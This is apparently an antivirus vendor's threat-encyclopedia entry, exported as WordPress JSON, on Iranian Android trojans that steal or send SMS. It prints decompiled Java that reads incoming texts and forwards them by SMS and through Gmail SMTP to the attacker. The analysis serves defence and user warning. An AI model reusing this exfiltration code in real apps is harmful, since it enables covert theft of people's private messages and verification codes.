{"id":968,"date":"2021-10-02T06:26:51","date_gmt":"2021-10-02T06:26:51","guid":{"rendered":"https:\/\/threats.amnpardaz.com\/en\/?p=968"},"modified":"2024-01-17T12:17:13","modified_gmt":"2024-01-17T12:17:13","slug":"trojan-android-smsspy-apkeditorsirhack","status":"publish","type":"post","link":"https:\/\/threats.amnpardaz.com\/en\/2021\/10\/02\/trojan-android-smsspy-apkeditorsirhack\/","title":{"rendered":"Trojan.Android.SmsSpy.ApkeditorsIrhack"},"content":{"rendered":"<h2>General explanation<\/h2>\n<p><strong>Type:<\/strong> Trojan<\/p>\n<p><strong>Degree of destruction:<\/strong> average<\/p>\n<p><strong>Prevalence:<\/strong> average<\/p>\n<p><strong>Malware names:<\/strong><\/p>\n<ul>\n<li>Trojan.Android.SmsSpy.ApkeditorsIrhack (Padvish)<\/li>\n<li>Trojan.Android.SmsSend.ApkeditorsIrhack (Padvish)<\/li>\n<li>HEUR:Trojan-SMS.AndroidOS.Agent.abr (Kaspersky)<\/li>\n<li>Android.Trojan.SMSSend.AQT (BitDefenderFalx)<\/li>\n<li>A Variant Of Android\/TrojanSMS.Agent.BZW (ESET-NOD32)<\/li>\n<li>Android.SmsSend.28203 (DrWeb)<\/li>\n<li>ANDROID\/TrojanSMS.IBAV.Gen (Avira)<\/li>\n<\/ul>\n<h2>What is the Trojan?<\/h2>\n<p>Trojans are malware types that introduce themselves as healthy and legal software and act similarly to practical and applicable software but cause many destructions to the system when executing. The downloaded software from the internet, placing HTML text, attaching it to an email, etc. are ways that Trojans are using to enter the system. Contrary to viruses and computer worms, Trojans are not reproducible.<\/p>\n<h2>What is SmsSend\/SmsSpy, the malware family?<\/h2>\n<p>There are many Iranian malicious applications with the \u201cSms Stealer\u201d family name in the diverse Android markets, unauthorized websites, Telegram channels, or infected links sent through SMS. A set of them aimed to access sent\/received SMS and send them to a specified number of attacker\u2019s emails that are known as \u201c<span style=\"color: #ff0000\">Com.APKEDITORS.IRHACK.APPS<\/span>\u201d.<\/p>\n<p>Another set also aimed to send SMS to a specified number by the attacker as soon as the program runs. Their package name is \u201cAMOOGRAM.VAHID.MAIL\u201d. These applications are distributed to users with names such as: Hacking the Telegram, Instagram password recovery, Fee Wi-Fi hack, member finder for channels and groups, free account charging, free internet, server connection, myket, etc.<\/p>\n<h2>Technical explanation<\/h2>\n<p>&nbsp;<\/p>\n<h4>&#8211; About infected malware set (SMS Stealer) \u201cAPKEDITORS.IRHACK.APPS:<\/h4>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-963\" src=\"https:\/\/threats.amnpardaz.com\/en\/wp-content\/uploads\/sites\/5\/2021\/10\/Trand.png\" alt=\"\" width=\"986\" height=\"294\" \/><\/p>\n<p>This application is \u201cTelegram Hacker\u201d. Immediately after running the program, the malware will first display a message to the user that the app is running, which exits the app after completing the Progress bar and display the following three messages:<\/p>\n<p>1- \u201cThis app does not match your device, your Android is not compatible\u201d.<\/p>\n<p>2- \u201cApplication is removed\u201d<\/p>\n<p>3- \u201cirhack_apps@\u201d<\/p>\n<p>Immediately after displaying these messages, it will exit the program, and hide the app icon but it is performing its malicious activity in the background.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-964\" src=\"https:\/\/threats.amnpardaz.com\/en\/wp-content\/uploads\/sites\/5\/2021\/10\/trand1.png\" alt=\"\" width=\"644\" height=\"309\" \/><\/p>\n<h3>IncomingSms<\/h3>\n<p>When the app sends the \u201cReceiving SMS\u201d message through Android, it can access a user\u2019s received SMS according to \u201candroid.permission.RECEIVE_SMS\u201d access permission received from the user when installing the application. It will fetch specifications such as (sender phone number and text of the message) from the received SMS and will send them to specified numbers using \u201candroid.permission.SEND_SMS\u201d permission in the form of a string.<\/p>\n<p><span style=\"color: #ff0000\">paramContext = (Object[])paramContext.get(&#8220;pdus&#8221;);<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0\u00a0<strong>int<\/strong>\u00a0i = 0;<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0\u00a0<strong>for<\/strong>\u00a0(;;)<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0{<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0<strong>if<\/strong>\u00a0(i &gt;= paramContext.length) {<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0<strong>return<\/strong>;<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0}<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0paramIntent = SmsMessage.createFromPdu((<strong>byte<\/strong>[])paramContext[i]);<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0<strong>this<\/strong>.<u>phoneNumber<\/u>\u00a0= paramIntent.getDisplayOriginatingAddress();<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0<strong>this<\/strong>.<u>messagex<\/u>\u00a0= paramIntent.getDisplayMessageBody();<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0Log.i(&#8220;SmsReceiver&#8221;,\u00a0<strong>new<\/strong>\u00a0StringBuffer().append(<strong>new<\/strong>\u00a0StringBuffer().append(&#8220;senderNum:&#8221;).append(<strong>this<\/strong>.<u>phoneNumber<\/u>).toString()).append(&#8220;; message: &#8220;).toString()+<strong>this<\/strong>.<u>messagex<\/u>);<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0<strong>try<\/strong><\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0{<\/span><\/p>\n<p><span style=\"color: #ff0000\">SmsManager.getDefault().sendTextMessage(&#8220;09123456789&#8221;, (String)<strong>null<\/strong>,\u00a0<strong>new<\/strong>\u00a0StringBuffer().append(<strong>this<\/strong>.<u>phoneNumber<\/u>).append(&#8220;:\/n\/n&#8221;).toString() +\u00a0<strong>this<\/strong>.<u>messagex<\/u>, (PendingIntent)<strong>null<\/strong>, (PendingIntent)<strong>null<\/strong>);<\/span><\/p>\n<p>Also, the attacker aimed to send this information to his email address using SMTP protocol. First, it will check the internet status of the user\u2019s phone and finally will collect all data from the user\u2019s SMS to its email.<\/p>\n<p><span style=\"color: #ff0000\">paramIntent.put(&#8220;mail.smtp.host&#8221;, &#8220;smtp.gmail.com&#8221;);<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0paramIntent.put(&#8220;mail.smtp.socketFactory.port&#8221;, &#8220;465&#8221;);<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0paramIntent.put(&#8220;mail.smtp.socketFactory.class&#8221;, &#8220;javax.net.ssl.SSLSocketFactory&#8221;);<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0paramIntent.put(&#8220;mail.smtp.auth&#8221;, &#8220;true&#8221;);<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0paramIntent.put(&#8220;mail.smtp.port&#8221;, &#8220;465&#8221;);<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0<strong>this<\/strong>.<u>session<\/u>\u00a0=\u00a0<u>Session<\/u>.<u>getDefaultInstance<\/u>(paramIntent,\u00a0<strong>new<\/strong>\u00a0Authenticator()<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0{<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0<strong>protected<\/strong>\u00a0<u>PasswordAuthentication<\/u>\u00a0getPasswordAuthentication()<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0{<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0<strong>return<\/strong>\u00a0<strong>new<\/strong>\u00a0<u>PasswordAuthentication<\/u>(&#8220;Sender@gmail.com&#8221;, &#8220;Password&#8221;);<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0}<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0});<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0<strong>new<\/strong>\u00a0<u>RetriveFeedTask<\/u>().execute(<strong>new<\/strong>\u00a0String[0]);<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0i += 1;<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0}<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0@Override<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0\u00a0<strong>protected<\/strong>\u00a0String doInBackground(String&#8230; paramVarArgs)<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0{<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0\u00a0<strong>try<\/strong><\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0{<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0paramVarArgs =\u00a0<strong>new<\/strong>\u00a0<u>MimeMessage<\/u>(<u>IncomingSms<\/u>.<strong>this<\/strong>.<u>session<\/u>);<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0paramVarArgs.<u>setFrom<\/u>(<strong>new<\/strong>\u00a0<u>InternetAddress<\/u>(&#8220;rec@gmail.com&#8221;));<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0paramVarArgs.<u>setRecipients<\/u>(<u>Message.RecipientType<\/u>.<u>TO<\/u>,\u00a0<u>InternetAddress<\/u>.<u>parse<\/u>(&#8220;Rec@gmail.com&#8221;));<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0paramVarArgs.<u>setSubject<\/u>(<u>IncomingSms<\/u>.<strong>this<\/strong>.<u>phoneNumber<\/u>);<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0paramVarArgs.setContent(<u>IncomingSms<\/u>.<strong>this<\/strong>.<u>messagex<\/u>, &#8220;text\/html; Charset=utf-8&#8221;);<\/span><\/p>\n<p><span style=\"color: #ff0000\">\u00a0 \u00a0 \u00a0 \u00a0\u00a0<u>Transport<\/u>.<u>send<\/u>(paramVarArgs);<\/span><\/p>\n<h4>&#8211; About the set of infected malware (sending SMS) \u201cAMOOGRAM.VAHID.MAIL\u201d:<\/h4>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-965\" src=\"https:\/\/threats.amnpardaz.com\/en\/wp-content\/uploads\/sites\/5\/2021\/10\/trand2.png\" alt=\"\" width=\"446\" height=\"652\" \/><\/p>\n<p>The goal of this group of malware is to send messages with \u201cHacked\u201d text to the specified phone number by the attacker. One of these applications is the \u201cFree Internet\u201d.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-966\" src=\"https:\/\/threats.amnpardaz.com\/en\/wp-content\/uploads\/sites\/5\/2021\/10\/trand3.png\" alt=\"\" width=\"698\" height=\"135\" \/><\/p>\n<h2>How to encounter this malware and disinfect the system<\/h2>\n<p>To be sure about the safety of your device, install and update the Padvish antivirus database file and scan your device.<\/p>\n<h3>How to prevent infection:<\/h3>\n<ul>\n<li>Avoid downloading and installing applications from unauthorized mobile markets<\/li>\n<li>Pay attention to access permission when installing applications.<\/li>\n<li>Constantly back up from all of your stored data<\/li>\n<li>Do not use unofficial versions. Applications such as Telegram and Instagram have many unofficial versions and most of them are distributed through Telegram channels.<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>General explanation Type: Trojan Degree of destruction: average Prevalence: average Malware names: Trojan.Android.SmsSpy.ApkeditorsIrhack (Padvish) Trojan.Android.SmsSend.ApkeditorsIrhack (Padvish) HEUR:Trojan-SMS.AndroidOS.Agent.abr (Kaspersky) Android.Trojan.SMSSend.AQT (BitDefenderFalx) A Variant Of Android\/TrojanSMS.Agent.BZW (ESET-NOD32) Android.SmsSend.28203 (DrWeb) ANDROID\/TrojanSMS.IBAV.Gen (Avira) What is the Trojan? Trojans are malware types that introduce themselves as healthy and legal software and act similarly to practical and applicable software but cause&hellip;<\/p>\n","protected":false},"author":16,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[24,36,42,43,45,46],"class_list":["post-968","post","type-post","status-publish","format-standard","hentry","category-trojan","tag-android","tag-padvish","tag-security","tag-trojan","tag-antivirus","tag-cybersecurity"],"_links":{"self":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/968","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/users\/16"}],"replies":[{"embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/comments?post=968"}],"version-history":[{"count":2,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/968\/revisions"}],"predecessor-version":[{"id":1293,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/968\/revisions\/1293"}],"wp:attachment":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/media?parent=968"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/categories?post=968"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/tags?post=968"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}